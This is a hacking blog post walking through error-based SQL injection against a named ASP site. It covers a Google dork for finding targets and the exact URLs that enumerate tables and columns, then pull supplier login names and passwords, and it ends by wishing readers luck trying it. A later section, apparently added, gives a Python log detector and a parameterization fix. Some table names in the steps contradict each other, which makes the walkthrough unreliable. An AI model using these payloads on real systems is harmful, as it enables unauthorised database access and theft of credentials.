Injection ASP
This time we will discuss how SQL injection is carried out against an ASP website.
Now we try to find a target using the dork inurl:"/e/product/product_list.asp?brand_id=".

For example

Target:
http://www.mygarbo.com/e/product/product_list.asp?brand_id=7

As with PHP, we check whether the site is vulnerable to SQL injection by appending ' to the end of the URL.
http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'

Microsoft OLE DB Provider for ODBC Drivers '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '7' '.
/e/include/i_search.asp,909

The error we are looking for is "Unclosed quotation mark before the character string".

Now we reveal the table names.
Command: and 1=convert(int(select top 1 table_name from information_schema.tables))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int(select%20top%201%20table_name%20from%20information_schema.tables))--

An error then appears:
Microsoft OLE DB Provider for ODBC Drivers '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'select' to a column of data type int.
/e/include/i_search.asp, 909
From that error, we know that the table name is select.

Now we reveal the next table name.
Command: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tabel1')))--
URL: http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select')))--

Another error is then returned:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'b2b_so_message' to a column of data type int.
The second table name is "b2b_so_message".

Now we look for the third table name.
Command: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tabel1','table2')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select','b2b_so_message')))--

Another error comes back:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'b2b_spec_matrix' to a column of data type int.
The third table name is "b2b_spec".

Now we reveal the fourth table name.
Command: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('table1','table2','table3')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select','b2b_so_message','b2b_spec')))--

The fourth table appears in the following error:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'b2b_spec_matrix' to a column of data type int.
The fourth table name is "b2b_spec_matrix".

We then reveal the next table, the fifth one.
Command: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('table1','table2','table3','table4')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('select','b2b_so_message','b2b_spec','b2b_spec_matrix')))--

Keep going until all the tables have been found, noting each table name along the way,
then look for other table names that you consider more interesting.

Suppose we have found the table we want; for example, the table I want is "b2b_supplier".
Now we try to reveal the column names in that table.
Command: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='nama_tabel'))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='b2b_supplier'))--

An error is then returned:

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'supplier_id' to a column of data type int.
From that error, we know that one of the columns of the table "b2b_supplier" is named "supplier_id".

Now we try to display the next column name.
Command: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='nama_tabel' and column_name not in ('nama_kolom1')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='b2b_supplier'%20and%20column_name%20not%20in%20('supplier_id')))--

An error appears:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 's_loginname' to a column of data type int.


We reveal the next column name.
Command: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='nama_tabel' and column_name not in ('nama_kolom1','nama_kolom2')))--
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name='b2b_supplier'%20and%20column_name%20not%20in%20('supplier_id','s_loginname')))--

Finally, the error we have been waiting for appears:
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 's_password' to a column of data type int.
The third column name is "s_password".

There are actually many more column names, but this is enough.

Now we reveal the data stored in those columns.
Command for 1 column: and 1=convert(int,(select top 1 nama_kolom from nama_tabel)
Command for several columns: and 1=convert(int,(select top 1 nama_kolom1%2b':'%2bnama_kolom2%2b':'%2bnama_kolom3 from nama_tabel))--
Explanation:
%2b stands for + , and : is used as the separator.
URL:http://www.mygarbo.com/e/product/product_list.asp?brand_id=7'and%201=convert(int,(select%20top%201%20supplier_id%2b':'%2bs_loginname%2b':'%2bs_password%20from%20b2b_supplier))--

Good luck trying it out.
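From the defender's side, the requests in this walkthrough leave a distinctive trail in web server logs: a trailing-quote probe, then repeated HTTP 500 responses whose query string carries convert(int,(select ... against information_schema, with a growing not in (...) list. The Python detector below is an added example, not part of the original article; the log layout, dates, IP addresses, status codes and the table name tbl_a are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed log lines (fields: date time c-ip method uri-stem uri-query status).
SAMPLE_LOG = """\
2009-08-04 10:00:01 192.0.2.10 GET /e/product/product_list.asp brand_id=7 200
2009-08-04 10:00:05 192.0.2.66 GET /e/product/product_list.asp brand_id=7' 500
2009-08-04 10:00:09 192.0.2.66 GET /e/product/product_list.asp brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-- 500
2009-08-04 10:00:14 192.0.2.66 GET /e/product/product_list.asp brand_id=7'and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('tbl_a')))-- 500
2009-08-04 10:00:20 192.0.2.10 GET /e/product/product_list.asp brand_id=12 200
"""

# Signatures of the error-based technique, matched on the decoded, lower-cased query.
RULES = {
    "quote_probe": re.compile(r"=\d+'\s*$"),
    "convert_subquery": re.compile(r"convert\s*\(\s*int\s*,?\s*\(\s*select\b"),
    "schema_enum": re.compile(r"information_schema\.(tables|columns)"),
    "not_in_paging": re.compile(r"\bnot\s+in\s*\("),
}

def classify(query):
    """Return the sorted names of the rules that a raw query string triggers."""
    text = re.sub(r"\s+", " ", unquote_plus(query)).lower()
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(log_text):
    """Map client IP -> list of (uri-stem, status, rule hits) for suspicious requests."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(" ")
        if line.startswith("#") or len(parts) != 7:
            continue  # skip W3C header directives and malformed lines
        _date, _time, client, _method, stem, query, status = parts
        hits = classify(query)
        if hits:
            findings[client].append((stem, status, hits))
    return dict(findings)

def enumerating_clients(findings, threshold=2):
    """Clients with >= threshold HTTP 500s that combine convert() with schema access."""
    flagged = []
    for client, events in findings.items():
        count = sum(1 for _stem, status, hits in events if status == "500"
                    and {"convert_subquery", "schema_enum"} <= set(hits))
        if count >= threshold:
            flagged.append(client)
    return sorted(flagged)
```

Detection only shows that probing happened; the durable fix is in the application: bind brand_id as a typed query parameter (or reject non-numeric values) and turn off detailed error pages so that driver messages never reach the client.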
Category: Hacking | Added by: neo-gabriel (08.04.2009)
Copyright Neo-Gabriel © 2017